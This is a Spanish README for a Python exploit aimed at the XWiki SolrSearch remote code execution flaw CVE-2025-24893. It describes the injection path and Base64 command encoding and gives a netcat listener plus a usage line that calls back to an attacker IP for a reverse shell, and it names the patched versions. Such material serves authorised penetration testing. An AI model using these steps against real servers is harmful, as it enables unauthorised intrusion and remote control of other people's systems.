
Exploit de ejecución remota de código (RCE) en XWiki
Exploit de Ejecución Remota de Código (RCE) en XWiki
Un exploit en Python3 para la CVE-2025-24893, una vulnerabilidad crítica de Ejecución Remota de Código No Autenticada (RCE) que afecta a la plataforma XWiki.
Este script explota una falla de Inyección de Código/Expresión (CWE-95) dentro del componente de la macro SolrSearch. La falla permite a los atacantes ejecutar código Groovy/Java arbitrario en el sistema operativo subyacente. El exploit realiza automáticamente la codificación en Base64 para evitar las limitaciones de interpretación de comandos de la función Runtime.getRuntime().exec() de Java.
/bin/get/Main/SolrSearch (a través del parámetro text)nc -lvnp 4444
python3 CVE-2025-24-893.py <URL_ALVO> <SEU_IP_VPN> <SUA_PORTA>
Ejemplo:
python3 CVE-2025-24-893.py http://domain.local 10.10.14.229 4444
requestsPara instalar la dependencia necesaria:
pip install requests
Actualice su instancia de XWiki a una de las versiones oficiales corregidas: 15.10.11, 16.4.1, 16.5.0-rc-1 (o superiores).
Este script fue desarrollado exclusivamente para fines educativos, auditorías de seguridad autorizadas y pruebas de penetración (Pentest). El autor no se responsabiliza por cualquier uso indebido, daños o actividades ilegales causadas por esta herramienta. La utilización de este script contra objetivos sin autorización previa es estrictamente ilegal.